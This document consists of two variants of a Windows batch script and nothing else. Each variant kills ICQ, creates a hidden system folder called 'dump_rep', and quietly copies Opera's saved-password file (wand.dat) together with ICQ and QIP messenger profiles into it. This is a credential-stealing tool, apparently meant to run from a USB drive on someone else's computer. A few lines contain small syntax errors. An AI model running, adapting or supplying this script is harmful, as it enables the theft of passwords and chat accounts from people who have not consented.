@echo off @taskkill /f /IM ICQ.exe @mkdir %~d0%\dump_rep @attrib %~d0%\dump_rep +h +s @copy "%APPDATA%\Opera\Opera\wand.dat" "%~d0%\dump_rep\wand.dat" /y @xcopy "%APPDATA%\ICQ" "%~d0%\dump_rep\ICQ" /s /y /i /q @xcopy "C:\Program Files (x86)\QIP 2010\Profiles" "%~d0%\dump_rep \QIP_2010" /s /y /i /q @xcopy "C:\Program Files\QIP 2010\Profiles" "%~d0%\dump_rep\QIP_2010" /s /y /i /q @xcopy "C:\Program Files (x86)\QIP\Users" "%~d0%\dump_rep\QIP" /s /y /i /q @xcopy "C:\Program Files\QIP\Users" "%~d0%\dump_rep\QIP" /s /y /i /q @xcopy "%APPDATA%\QIP\Profiles" "%~d0%\dump_rep\appQIP" /s /y /i /q
@echo off @taskkill /f /IM ICQ.exe @mkdir %CD%\dump_rep @attrib %CD%%\dump_rep +h +s @copy "%APPDATA%\Opera\Opera\wand.dat" %CD%\dump_rep\wand.dat" /y @xcopy "%APPDATA%\ICQ" "%CD%\dump_rep\ICQ" /s /y /i /q @xcopy "C:\Program Files (x86)\QIP 2010\Profiles" "%CD%\dump_rep\QIP_2010" /s /y /i /q @xcopy "C:\Program Files\QIP 2010\Profiles" "%CD%\dump_rep\QIP_2010" /s /y /i /q @xcopy "C:\Program Files (x86)\QIP\Users" "%CD%\dump_rep\QIP" /s /y /i /q @xcopy "C:\Program Files\QIP\Users" "%CD%\dump_rep\QIP" /s /y /i /q @xcopy "%APPDATA%\QIP\Profiles" "%CD%\dump_rep\appQIP" /s /y /i /q